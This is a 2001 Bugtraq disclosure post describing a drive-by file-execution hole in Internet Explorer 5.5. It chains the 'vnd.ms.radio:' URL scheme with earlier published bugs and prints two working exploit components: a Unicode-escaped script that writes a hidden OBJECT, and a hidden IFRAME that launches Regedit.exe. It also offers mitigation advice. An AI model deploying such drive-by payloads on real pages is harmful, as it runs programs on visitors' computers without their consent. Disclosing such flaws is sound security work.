[19981] in bugtraq
HTML.cobble
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Sun Apr 1 13:14:05 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15005997.986102168088.JavaMail.imail@goochy.excite.com>
Date: Sat, 31 Mar 2001 21:16:02 -0800
Reply-To: http-equiv@excite.com
From: "http-equiv@excite.com" <http-equiv@excite.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Sunday, April 1, 2001
Default installation of Internet Explorer 5.5 with all of its so-called
patches, service "packs" etc, still allows us to execute files on default
installations of the target computer:
Once Again:
We cobble together new and old Components as follows : -
1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1978)
2. Courtesy of Dildog (http://www.securityfocus.com/bid/1394)
3. vnd.ms.radio:http://www.malware.com/
Internet Explorer 5.5 has a "neat" built-in radio system. An oft touted
wonder feature. This incredible feature enjoys its own url scheme, the
so-called "vnd.ms.radio:". What we then do is take our Georgi Guninski
<object data="" type="text/html"> and point it to our so-called
"vnd.ms.radio:" *.url.
But first we create yet another html page comprising our generic object
courtesy of Dildog and point that to the file we wish to execute.
Specifically:
Component 1
document.writeln('\u003c\u004f\u0042\u004a\u0045\u0043\u0054\u0020\u0044\u0041\u0054\u0041\u003d\u0022\u0043\u003a\u005c\u0057\u0049\u004e\u0044\u004f\u0057\u0053\u005c\u0054\u0045\u004d\u0050\u005c\u0072\u0061\u0064\u0069\u006f\u002e\u0075\u0072\u006c\u0022\u0020\u0054\u0059\u0050\u0045\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0068\u0074\u006d\u006c\u0022\u0020\u0057\u0049\u
0044\u0054\u0048\u003d\u0032\u0030\u0030\u0020\u0048\u0045\u0049\u0047\u0048\u0054\u003d\u0032\u0030\u0030\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u004f\u0042\u004a\u0045\u0043\u0054\u003e');
Component 2
<IFRAME
SRC="vnd.ms.radio:http://www.malware.com/infosec/US-eng/drivel/hahaha?<BODY><OBJECT
CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='C:\WINDOWS\Regedit.exe'></OBJECT> </BODY></HTML>" WIDTH=100
HEIGHT=100 STYLE="DISPLAY:NONE"></IFRAME>
What happens is our so-called "vnd.ms.radio:" url is called, but because
there is no 'real' audio file to play, it creates a named file in
our'C:\WINDOWS\TEMP, we include in the so-called "vnd.ms.radio:" url our
code to execute our file. We then call our so-called "vnd.ms.radio:" *.url
through our Component 1 which parses it as html and in turn, being outside
the so-called "Security Zones" fires our generic object which then executes!
our file:
Working Example:
[note: tested on default installation of win98 and default installation of
IE5.5 both patched to the hilt]
http://www.malware.com/drivel.html
Notes:
1. Again, default installs of both Os and IE5.5 (both fully patched as of
today's date)
2. Unable to include external code at this time. No time. No interest.
3. Monster 1.5Meg patch dated August 09, 2000 does absolutely nothing
(http://www.microsoft.com/technet/security/bulletin/MS00-055.asp)
4. Disable ActiveX and Scripting and relocate the temp folder.
---
http://www.malware.com
_______________________________________________________
Send a cool gift with your E-Card
http://www.bluemountain.com/giftcenter/
